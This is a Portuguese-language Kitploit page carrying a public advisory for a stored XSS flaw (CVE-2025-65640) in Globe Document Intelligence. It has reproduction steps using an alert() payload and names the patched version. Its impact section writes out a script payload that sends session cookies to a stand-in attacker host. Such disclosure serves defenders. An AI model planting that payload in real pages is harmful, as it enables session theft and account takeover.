Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-65640 — Aviso público para CVE-2025-65640: vulnerabilidade de XSS armazenado no Globe Document Intelligence. | Kitploit
Ferramentas/GitHubGitHub/vincenzo-emanuele/cve-2025-65640
Análise de VulnerabilidadesExploração de Aplicações WebSegurança WebTestes de PenetraçãoPapers e PesquisaAprendizado e Educação
GitHubvincenzo-emanuele/cve-2025-65640

CVE-2025-65640

Aviso público para CVE-2025-65640: vulnerabilidade de XSS armazenado no Globe Document Intelligence.

Ver Repositório
103há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-65640

1. Informações da Vulnerabilidade

  • CVE ID: CVE-2025-65640 (Atualmente RESERVADO)
  • Tipo de Vulnerabilidade: Cross-Site Scripting Armazenado (XSS)
  • Pontuação CVSSv3: 6.3 (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N)
  • Fornecedor: Arket/Bluenext S.r.l.
  • Produto: Globe Document Intelligence
  • Versão Afetada: 5.0.0.559
  • Descobridor: Vincenzo Emanuele Martone

2. Descrição

Foi identificada uma vulnerabilidade de Cross-Site Scripting (XSS) Armazenado na plataforma Globe Document Intelligence (versão 5.0.0.559). O aplicativo não sanitiza nem codifica adequadamente a entrada fornecida pelo usuário na propriedade "Título" de um documento recém-criado. Quando um usuário autenticado navega para as páginas de resumo (por exemplo, "Tarefa em andamento / Recentes"), o payload malicioso é refletido e executado no contexto do navegador da vítima.

3. Impacto

Esta vulnerabilidade permite que um atacante autenticado armazene código JavaScript malicioso no servidor. Quando outros usuários autenticados (incluindo contas administrativas) visualizam as páginas afetadas, o script é executado automaticamente. Embora a Prova de Conceito abaixo demonstre a vulnerabilidade usando um alert() benigno, um atacante pode explorar essa falha para realizar Sequestro de Sessão e Tomada de Conta. Por exemplo, a injeção de um payload como <script>fetch('https://attacker.com/?cookie='+encodeURIComponent(document.cookie))</script> exfiltraria silenciosamente os cookies de sessão da vítima para um servidor externo controlado pelo atacante.

4. Passos para Reproduzir (Prova de Conceito)

Para reproduzir a vulnerabilidade, um atacante autenticado pode seguir estes passos:

  1. Navegue até a seção de criação de documentos ("Nuovo documento") e preencha os campos obrigatórios com dados arbitrários para criar um novo documento com sucesso.
  2. Envie o formulário e crie o documento.
  3. Selecione o documento recém-criado, abra o menu de contexto (Botão direito -> Propriedades do Documento) e localize o campo "Título".
  4. Injete o seguinte payload XSS básico no campo "Título": <script>alert("XSS")</script>
  5. Salve as alterações. O payload malicioso agora está armazenado de forma persistente no banco de dados.
  6. Navegue até a página "Tarefa em andamento / Recentes" (Task in attesa/Recenti).
  7. Como a página renderiza o título do documento sem a devida codificação de saída, o payload JavaScript é executado, acionando o alert.

5. Mitigação Recomendada

De acordo com o fornecedor, esta vulnerabilidade foi corrigida na versão 5.1.0.575. Para remediar este problema, recomenda-se atualizar a plataforma Globe Document Intelligence para a versão 5.1.0.575.


Isenção de Responsabilidade

Esta Prova de Conceito (PoC) é fornecida exclusivamente para fins educacionais e de pesquisa. As informações e o código descritos neste documento não devem ser usados para atividades maliciosas ou contra quaisquer sistemas sem autorização prévia e explícita dos proprietários dos sistemas. O autor não assume nenhuma responsabilidade e não se responsabiliza por qualquer uso indevido ou dano causado pela aplicação do material fornecido.

Baixar ferramenta